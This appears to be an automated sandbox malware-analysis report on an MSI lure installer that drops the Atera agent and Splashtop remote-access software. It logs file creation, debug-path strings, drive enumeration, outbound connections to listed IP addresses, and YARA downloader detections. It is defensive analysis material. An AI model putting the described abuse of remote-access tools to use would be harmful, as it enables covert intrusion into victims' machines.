                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-locale-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Transactions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Uri.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.Watcher.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XmlDocument.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-errorhandling-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.CoreLib.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Algorithms.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\netstandard.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\hostJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\host\fxrJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\host\fxr\6.0.35Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\host\fxr\6.0.35\hostfxr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\dotnet.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\LICENSE.txtJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\ThirdPartyNotices.txtJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\license.txtJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\license.txtJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp\license.txtJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp64\license.txtJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\LICENSE.txtJump to behavior
                                Source: Binary string: System.Threading.Tasks.Dataflow.ni.pdb source: System.Threading.Tasks.Dataflow.dll.1.dr
                                Source: Binary string: Microsoft.CSharp.ni.pdb source: Microsoft.CSharp.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net6.0\System.Text.Encodings.Web.pdb source: System.Text.Encodings.Web.dll0.24.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.Primitives\net6.0-Release\System.IO.FileSystem.Primitives.pdb source: System.IO.FileSystem.Primitives.dll.1.dr
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.FileSystemGlobbing/Release/net6.0/Microsoft.Extensions.FileSystemGlobbing.pdb source: Microsoft.Extensions.FileSystemGlobbing.dll.24.dr
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb<$ source: AteraAgent.exe, 0000000C.00000000.1754536857.000001C5CB452000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: c:\slave\workspace\GIT_WIN_Comp_SRUSB\Source_RemoteUSB_VH\src\platform\windows\Release\x64\SRUsb.pdb source: SRUsb.exe.1.dr
                                Source: Binary string: C:\projects\litedb\LiteDB\obj\Release\net4.5\LiteDB.pdb source: LiteDB.dll.24.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb source: AgentPackageAgentInformation.exe, 00000014.00000002.1954998107.000001BE62A42000.00000002.00000001.01000000.00000018.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.Cng\net6.0-windows-Release\System.Security.Cryptography.Cng.pdb source: System.Security.Cryptography.Cng.dll.1.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb( source: System.IO.Compression.ZipFile.dll.24.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdb source: System.Runtime.InteropServices.dll.24.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdbH5b5 T5_CorDllMainmscoree.dll source: System.Runtime.InteropServices.dll.24.dr
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdb source: NLog.dll.24.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.IsolatedStorage\net6.0-windows-Release\System.IO.IsolatedStorage.pdb source: System.IO.IsolatedStorage.dll.1.dr
                                Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/Release/net6.0-windows/System.Diagnostics.EventLog.pdbSHA256 source: System.Diagnostics.EventLog.dll.24.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb* source: System.Diagnostics.Process.dll.24.dr
                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\svn\branches\features\iris00_v3_20150407_69486\win32\stxpsdrv\src\filters\nup\objfre_win7_x86\i386\xdnup.pdb source: xdnup.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\net6.0-Release\System.Runtime.Serialization.Json.pdb source: System.Runtime.Serialization.Json.dll.1.dr
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb source: AteraAgent.exe, 0000000C.00000000.1754536857.000001C5CB452000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: c:\slave\workspace\GIT_WIN_Comp_SRUSB\Source_RemoteUSB_VH\src\platform\windows\Release\x64\SRUsb.pdbH source: SRUsb.exe.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Data.Common\net6.0-Release\System.Data.Common.pdb source: System.Data.Common.dll.1.dr
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
                                Source: Binary string: System.Private.DataContractSerialization.ni.pdb source: System.Private.DataContractSerialization.dll.1.dr
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdbSHA256mW source: AteraAgent.exe, 0000000D.00000002.2284169189.0000020AB9F22000.00000002.00000001.01000000.0000001F.sdmp
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdb source: AteraAgent.exe, 0000000D.00000002.2284169189.0000020AB9F22000.00000002.00000001.01000000.0000001F.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Tasks.Dataflow\net6.0-Release\System.Threading.Tasks.Dataflow.pdb source: System.Threading.Tasks.Dataflow.dll.1.dr
                                Source: Binary string: System.Private.CoreLib.ni.pdb source: System.Private.CoreLib.dll.1.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA2567 source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2280646482.0000020AB9882000.00000002.00000001.01000000.0000001E.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb source: System.Diagnostics.Process.dll.24.dr
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdbSHA256d source: NLog.dll.24.dr
                                Source: Binary string: D:\a\1\s\AgentPackageAgentInformation\AgentPackageAgentInformation\obj\Release\AgentPackageAgentInformation.pdb source: AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.1924528514.000001BE62232000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\netcoreapp3.1\Microsoft.Win32.TaskScheduler.pdb source: Microsoft.Win32.TaskScheduler.dll0.24.dr
                                Source: Binary string: d:\slave\workspace\GIT_WIN_SRS_Formal\Source\irisserver\Release\SRUnPackFile.pdb source: SplashtopStreamer.exe, 00000024.00000002.2593578356.000000000042E000.00000002.00000001.01000000.0000001B.sdmp, SplashtopStreamer.exe, 00000024.00000000.2186291125.000000000042E000.00000002.00000001.01000000.0000001B.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\netcoreapp3.1\Microsoft.Win32.TaskScheduler.pdbSHA256 source: Microsoft.Win32.TaskScheduler.dll0.24.dr
                                Source: Binary string: System.IO.IsolatedStorage.ni.pdb source: System.IO.IsolatedStorage.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XDocument\net6.0-Release\System.Xml.XDocument.pdbt+ source: System.Xml.XDocument.dll.1.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955108650.000001BE62AF2000.00000002.00000001.01000000.00000019.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2669791407.00000217326D0000.00000002.00000001.01000000.00000021.sdmp
                                Source: Binary string: d:\slave\workspace\GIT_WIN_SRS_Formal\Source\irisserver\Release\PreVerCheck.pdb source: PreVerCheck.exe, 00000025.00000000.2215637852.0000000000BE3000.00000002.00000001.01000000.0000001C.sdmp, PreVerCheck.exe, 00000025.00000002.2561997635.0000000000BE3000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb source: System.IO.Compression.ZipFile.dll.24.dr
                                Source: Binary string: C:\projects\litedb\LiteDB\obj\Release\net4.5\LiteDB.pdbSHA256 source: LiteDB.dll.24.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2280646482.0000020AB9882000.00000002.00000001.01000000.0000001E.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955108650.000001BE62AF2000.00000002.00000001.01000000.00000019.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2669791407.00000217326D0000.00000002.00000001.01000000.00000021.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb source: System.Reflection.Primitives.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb8+N+ @+_CorDllMainmscoree.dll source: System.Reflection.Primitives.dll.1.dr
                                Source: Binary string: c:\svn\branches\features\iris00_v3_20150407_69486\win32\stxpsdrv\src\filters\nup\objfre_win7_x86\i386\xdnup.pdbh source: xdnup.dll.1.dr
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: System.Private.CoreLib.dll.1.dr
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\wixca.pdb source: Arquivo_4593167.msi
                                Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/Release/net6.0-windows/System.Diagnostics.EventLog.pdb source: System.Diagnostics.EventLog.dll.24.dr
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbP source: rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\CodeBases\isdev\Src\Runtime\InstallScript\ISBEW64\x64\Release\ISBEW64.pdb source: _isA1FD.exe, 00000028.00000000.2252067091.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000028.00000002.2255085096.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000029.00000002.2256104339.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000029.00000000.2252661620.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002A.00000000.2253370724.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002A.00000002.2256268057.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002B.00000002.2258725000.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002B.00000000.2255045633.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002C.00000000.2255937185.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002C.00000002.2259881834.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002D.00000002.2289803250.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002D.00000000.2257963587.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002E.00000002.2262306546.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002E.00000000.2259356144.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002F.00000002.2262839005.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002F.00000000.2260351966.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000030.00000002.2265092670.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000030.00000000.2261419648.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000031.00000002.2267141038.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000031.00000000.2262303471.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit\net6.0-Release\System.Reflection.Emit.pdb source: System.Reflection.Emit.dll.1.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdbPf source: AgentPackageAgentInformation.exe, 00000014.00000002.1954998107.000001BE62A42000.00000002.00000001.01000000.00000018.sdmp
                                Source: Binary string: W.pdb$Gs0 source: PreVerCheck.exe, 00000025.00000002.2562182711.0000000000BF5000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/net6.0-Release/System.Private.DataContractSerialization.pdb source: System.Private.DataContractSerialization.dll.1.dr
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Diagnostics.DiagnosticSource\net45\System.Diagnostics.DiagnosticSource.pdb source: System.Diagnostics.DiagnosticSource.dll1.24.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XDocument\net6.0-Release\System.Xml.XDocument.pdb source: System.Xml.XDocument.dll.1.dr
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: api-ms-win-core-localization-l1-2-0.dll.1.dr
                                Source: Binary string: System.Security.Cryptography.Cng.ni.pdb source: System.Security.Cryptography.Cng.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.CSharp\net6.0-windows-Release\Microsoft.CSharp.pdb source: Microsoft.CSharp.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net6.0\System.Text.Encodings.Web.pdbSHA256~f source: System.Text.Encodings.Web.dll0.24.dr
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdbSHA256 source: AteraAgent.exe, 0000000C.00000002.1792642291.000001C5E59A2000.00000002.00000001.01000000.00000011.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdb source: AteraAgent.exe, 0000000C.00000002.1792642291.000001C5E59A2000.00000002.00000001.01000000.00000011.sdmp, AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E74000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\SfxCA.pdb source: Arquivo_4593167.msi
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Tasks.Dataflow\net6.0-Release\System.Threading.Tasks.Dataflow.pdbRSDS source: System.Threading.Tasks.Dataflow.dll.1.dr
                                Source: Binary string: System.Data.Common.ni.pdb source: System.Data.Common.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\net6.0-Release\System.Runtime.Serialization.Json.pdbT*n* `*_CorDllMainmscoree.dll source: System.Runtime.Serialization.Json.dll.1.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Json\4.0.1.0\System.Runtime.Serialization.Json.pdb source: System.Runtime.Serialization.Json.dll.24.dr
                                Source: Binary string: c:\winddk\7600.16385.1\src\setup\difxapi\difxcmd\objfre_win7_x86\i386\DIFxCmd.pdb source: DIFxCmd.exe.1.dr
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.FileSystemGlobbing/Release/net6.0/Microsoft.Extensions.FileSystemGlobbing.pdbSHA256 source: Microsoft.Extensions.FileSystemGlobbing.dll.24.dr
                                Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: c:
                                Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00406657 __EH_prolog3_GS,GetFullPathNameW,_DebugHeapAllocator,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,_DebugHeapAllocator,36_2_00406657
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00428B20 _DebugHeapAllocator,_DebugHeapAllocator,FindFirstFileW,_DebugHeapAllocator,_DebugHeapAllocator,_DebugHeapAllocator,_DebugHeapAllocator,FindNextFileW,FindClose,_DebugHeapAllocator,36_2_00428B20
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BBB1E5 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindClose,37_2_00BBB1E5
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\lib\
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\node_modules\
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\node_modules\async\lib\
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\node_modules\async\
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B601A44h12_2_00007FFD9B60187E
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B601FFFh12_2_00007FFD9B60187E
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B601FFFh12_2_00007FFD9B601EB6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B601FFFh12_2_00007FFD9B601E88
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B601FFFh12_2_00007FFD9B601E7E
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B601873h12_2_00007FFD9B600C1D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B60227Bh12_2_00007FFD9B600C1D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B624ECBh13_2_00007FFD9B624E45
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B63B972h13_2_00007FFD9B63B5E7
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B63B972h13_2_00007FFD9B63B620
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B621873h13_2_00007FFD9B620C58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B62227Bh13_2_00007FFD9B620C58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B614ECBh24_2_00007FFD9B614E6B

                                Networking

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.119.152.241 443
                                Enables network access during safeboot for specific services
                                Source: C:\Windows\SysWOW64\msiexec.exeRegistry value created: NULL Service
                                Yara detected Generic Downloader
                                Source: Yara matchFile source: 20.0.AgentPackageAgentInformation.exe.1be62230000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\netstandard.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\choco.exe, type: DROPPED
                                Source: Joe Sandbox ViewIP Address: 40.119.152.241 40.119.152.241
                                Source: Joe Sandbox ViewIP Address: 35.157.63.228 35.157.63.228
                                Source: Joe Sandbox ViewIP Address: 13.35.58.124 13.35.58.124
                                Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
